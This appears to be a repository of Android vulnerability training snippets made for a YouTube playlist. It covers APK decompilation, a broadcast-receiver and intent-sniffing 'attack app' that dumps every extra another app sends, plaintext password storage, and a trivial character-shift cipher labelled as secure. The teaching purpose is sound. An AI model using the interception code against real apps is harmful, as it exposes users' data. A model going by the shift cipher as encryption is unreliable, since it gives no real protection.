├── APKExtract.txt ├── BroadcastReceiver.txt ├── Capability leak.txt ├── README.md ├── Storage.txt ├── activitiesAccess.txt └── intent.txt /APKExtract.txt: -------------------------------------------------------------------------------- 1 | /* 2 | Convert Android Apk to source code 3 | */ 4 | 5 | options 6 | 1- chnage .APK file to .ZIP file and extract it 7 | 2- use APK tool 8 | http://ibotpeaches.github.io/Apktool/ 9 | 3- Convert APK to soure code using dex2jar 10 | https://sourceforge.net/projects/dex2jar/files/ 11 | 12 | Run this command to convert .APK to .RAR 13 | Mac 14 | ./d2j-dex2jar.sh -f -o output_jar.jar file.apk 15 | Windows 16 | d2j-dex2jar.bat file.apk 17 | 18 | 19 | 20 | IDE view source .RAR file 21 | http://jd.benow.ca 22 | 23 | 24 | 4- GET APK from play store 25 | https://apkpure.com -------------------------------------------------------------------------------- /BroadcastReceiver.txt: -------------------------------------------------------------------------------- 1 | /* 2 | attack on BroadcastReceiver Android 3 | */ 4 | 5 | 6 | 1-// normal App 7 | A- Add these lines in application tag in manifest.xml 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 19 | 20 | 21 | B- Add services class 22 | public class ServiceNotification extends IntentService { 23 | public static boolean ServiceIsRun=false; 24 | 25 | public ServiceNotification() { 26 | super("MyWebRequestService"); 27 | } 28 | protected void onHandleIntent(Intent workIntent) { 29 | 30 | // continue sending the messages 31 | while ( ServiceIsRun) { 32 | // creat new intent 33 | Intent intent = new Intent(); 34 | //set the action that will receive our broadcast 35 | intent.setAction("com.example.Broadcast"); 36 | // add data to the bundle 37 | intent.putExtra("username", "alxs1aa"); 38 | // send the data to broadcast 39 | sendBroadcast(intent); 40 | //delay for 50000ms 41 | try{ 42 | Thread.sleep(50000); 43 | }catch (Exception ex){} 44 | 45 | 46 | } 47 | } 48 | 49 | 50 | } 51 | 52 | C-Add BroadcastReceiver Class 53 | 54 | /** 55 | * Created by hussienalrubaye on 3/6/16. 56 | */ 57 | public class MyReceiver extends BroadcastReceiver { 58 | 59 | @Override 60 | public void onReceive(Context context, Intent intent) { 61 | // get the bundles in the message 62 | final Bundle bundle = intent.getExtras(); 63 | // check the action equal to the action we fire in broadcast, 64 | if ( intent.getAction().equalsIgnoreCase("com.example.Broadcast")) 65 | //read the data from the intent 66 | Toast.makeText(context,bundle.getString("username"),Toast.LENGTH_LONG).show(); 67 | } 68 | } 69 | //Start service from main activity 70 | // check if the services is already runs in background 71 | if(ServiceNotification.ServiceIsRun==false ) { 72 | ServiceNotification.ServiceIsRun = true; 73 | //register the services to run in background 74 | Intent intent = new Intent(this, ServiceNotification.class); 75 | // start the services 76 | startService(intent); 77 | 78 | } 79 | 80 | 81 | 2-// attack app 82 | A- Add these lines in application tag in manifest.xml 83 | 84 | 85 | 88 | 89 | 90 | 91 | 92 | 93 | B-Add BroadcastReceiver Class 94 | 95 | public class MyReceiver extends BroadcastReceiver { 96 | 97 | @Override 98 | public void onReceive(Context context, Intent intent) { 99 | String DataBundel=""; 100 | // get app the data sent on bundle 101 | Bundle bundle= intent.getExtras(); 102 | //lopp through all keys in the bundle 103 | for (String key : bundle.keySet()) { 104 | // get object by key( we define object became it may be text or image or whatever 105 | Object value = bundle.get(key); 106 | //get all keys 107 | DataBundel+= String.format("%s %s (%s)", key, value.toString(), value.getClass().getName()); 108 | } 109 | //display notify message to the user 110 | NewMessageNotification NotifyMe=new NewMessageNotification(); 111 | NotifyMe.notify( context, DataBundel, 123); 112 | 113 | } 114 | } 115 | 116 | C- Add Notification class from (Right click on Java packge code when main activity are located->new ->UI component-> Notification)then name the class with name "NewMessageNotification" 117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /Capability leak.txt: -------------------------------------------------------------------------------- 1 | /* 2 | Learn how to convert APK to real files 3 | */ 4 | 5 | 6 | 1- just change .APK to .ZIP and extract it. 7 | 8 | 2- use APK tool, to get your source 9 | http://ibotpeaches.github.io/Apktool/ 10 | 11 | 3- convert smile to java 12 | A-DEc2Java:convert java to different format 13 | https://sourceforge.net/projects/dex2jar/files/ 14 | 15 | Run this command to get .rar file from .apk file 16 | ./d2j-dex2jar.sh -f -o output_jar.jar PATH 17 | 18 | 19 | B- IDE view source .rar code 20 | http://jd.benow.ca 21 | 22 | 23 | 4-Other Project 24 | A- convert app to APK 25 | https://apkpure.com 26 | getting APK Package name from google play 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 2 | # Android Vulnerability Training 3 | ###This code is snapped code for this [Android Vulnerability Youtube playlist](https://www.youtube.com/playlist?list=PLF8OvnCBlEY2f7r1Ei65-xJpet8xLYm5d) 4 | To make the learn and writing code easy 5 | -------------------------------------------------------------------------------- /Storage.txt: -------------------------------------------------------------------------------- 1 | /* 2 | store data in the app 3 | */ 4 | 5 | 6 | 1- // XML layout 7 | 8 | 12 | 13 | 18 | 19 | 24 | 25 | 31 | 32 | 33 | 34 | 39 | 40 | 45 | 46 | 52 | 53 | 54 | 55 | 56 | 57 | 2-- unsecure code 58 | // shared references files name 59 | public static final String MyPREFERENCES = "MyPrfLogin" ; 60 | // key for user name 61 | public static final String UserName = "UserNameKey"; 62 | // key for password 63 | public static final String Password = "PasswordKey"; 64 | // shared references instance to access to virtual file 65 | SharedPreferences sharedpreferences; 66 | // input text name 67 | EditText etUserName; 68 | // input text password 69 | EditText etPassword; 70 | @Override 71 | protected void onCreate(Bundle savedInstanceState) { 72 | super.onCreate(savedInstanceState); 73 | setContentView(R.layout.activity_main); 74 | Toolbar toolbar = (Toolbar) findViewById(R.id.toolbar); 75 | setSupportActionBar(toolbar); 76 | // initialize user name instance with the real input in xml 77 | etUserName=(EditText)findViewById(R.id.etUserName); 78 | // initialize password instance with the real input in xml 79 | etPassword=(EditText)findViewById(R.id.etPassword); 80 | // // initialize shared references 81 | sharedpreferences = getSharedPreferences(MyPREFERENCES, Context.MODE_PRIVATE); 82 | // access to the floating button 83 | FloatingActionButton fab = (FloatingActionButton) findViewById(R.id.fab); 84 | // listen to floating button when click 85 | fab.setOnClickListener(new View.OnClickListener() { 86 | @Override 87 | public void onClick(View view) { 88 | // save data 89 | // enable start editing file 90 | SharedPreferences.Editor editor = sharedpreferences.edit(); 91 | // add user name 92 | editor.putString(UserName, etUserName.getText().toString()); 93 | // add password 94 | editor.putString(Password, etPassword.getText().toString()); 95 | // save the update data 96 | editor.commit(); 97 | //display message saved 98 | Toast.makeText(MainActivity.this, "Data is Saved", Toast.LENGTH_LONG).show(); 99 | 100 | } 101 | }); 102 | } 103 | 104 | 105 | //secure code encript 106 | // cipher encryption add shift for key 107 | /* 108 | // cipher encryption add shift for key 109 | cipher(“hussein”, 10) // result “r }}osx” 110 | // cipher Decryptions 111 | cipher(“r }}osx”, -10) / result “Hussein” 112 | */ 113 | String cipher(String msg, int shift){ 114 | String s = ""; 115 | int len = msg.length(); // get string length 116 | for(int x = 0; x < len; x++){ 117 | char c = (char)(msg.charAt(x) + shift); // shift every character 118 | s += c; // append the characters 119 | } 120 | return s; 121 | } 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /activitiesAccess.txt: -------------------------------------------------------------------------------- 1 | /* 2 | how to open activity 3 | */ 4 | 1// from adb run 5 | • ./adb shell 6 | • am start –n PackageName/.ActivityName 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /intent.txt: -------------------------------------------------------------------------------- 1 | /* 2 | how use intent 3 | */ 4 | 5 | 6 | 1// sender 7 | final EditText etComment=(EditText)findViewById(R.id.etComment); 8 | Intent intent=getPackageManager().getLaunchIntentForPackage("com.example.hussienalrubaye.receiver"); 9 | // put the data that we want to send over intent 10 | intent.putExtra("Comment",etComment.getText().toString());); 11 | // start another app 12 | startActivity(intent); 13 | 14 | 15 | 2//reciver 16 | 17 | 18 | TextView txtview=(TextView)findViewById(R.id.txtDisplay); 19 | 20 | // get app the data sent on bundle 21 | Bundle b=getIntent().getExtras(); 22 | // display the key that have the data 23 | txtview.setText(b.getString("Comment")); 24 | 25 | 3- hacker app 26 | 27 | TextView txtDisplay=(TextView)findViewById(R.id.txtDisplay); 28 | String DataBundel=""; 29 | // get app the data sent on bundle 30 | Bundle bundle=getIntent().getExtras(); 31 | //loop through all keys in the bundle 32 | for (String key : bundle.keySet()) { 33 | // get object by key( we define object became it may be text or image or whatever 34 | Object value = bundle.get(key); 35 | //get all keys 36 | DataBundel+= String.format("%s %s (%s)", key, value.toString(), value.getClass().getName()); 37 | } 38 | txtDisplay.setText(DataBundel); 39 | 40 | --------------------------------------------------------------------------------